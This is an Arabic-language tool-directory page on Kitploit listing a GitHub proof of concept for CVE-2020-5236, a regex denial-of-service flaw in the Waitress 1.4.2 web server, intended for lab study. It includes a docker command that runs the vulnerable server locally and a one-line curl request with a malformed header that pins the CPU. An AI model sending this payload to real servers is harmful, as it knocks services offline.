Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2020-5236 — Waitress 1.4.2 ReDoS - CVE-2020-5236 (كود نموذجي من مدونة) | Kitploit
أدوات/GitHubGitHub/motikan2010/cve-2020-5236
تحليل الثغرات الأمنيةأمن الويبالتعلم والتعليممختبرات وتدريب عملي
GitHubmotikan2010/cve-2020-5236

CVE-2020-5236

Waitress 1.4.2 ReDoS - CVE-2020-5236 (كود نموذجي من مدونة)

عرض المستودع
421منذ 6 سنواتلم تتم المراجعة بعد
الموقع الإلكتروني

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Waitress 1.4.2 ReDoS - CVE-2020-5236

يتيح إصدار Waitress 1.4.2 شن هجوم حجب الخدمة (DoS). فعندما يستقبل Waitress ترويسة تحتوي على أحرف غير صالحة، مثل ترويسة بالشكل "Bad-header: xxxxxxxxxxxxxxx\x10"، فإن ذلك يؤدي إلى تراجع كارثي في محرك التعبير النمطي (regex)، ما يسبب استهلاك العملية 100% من زمن المعالج (CPU) وحجب أي تفاعلات أخرى. وهذا يسمح للمهاجم بإرسال طلب واحد يحمل ترويسة غير صالحة لإخراج الخدمة عن العمل.

بواسطة NVD

الاستخدام

تشغيل الخادم الضعيف

$ docker run --rm --name waitress -v "$PWD/src:/src" -p "8080:8080" -it python:3.7-slim python /src/server.py

PoC

$ curl "http://127.0.0.1:8080/hello/hogefuga" -H "Bad-header: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx`echo -n '\x10'`"

اعرض استخدام وحدة المعالجة المركزية (CPU) للخادم. نفّذ "docker stats waitress".

↓ نفّذ PoC

المراجع

  • NVD - CVE-2020-5236
  • التراجع الكارثي في التعبير النمطي يتيح حجب الخدمة · استشارة أمنية · Pylons/waitress
تنزيل الأداة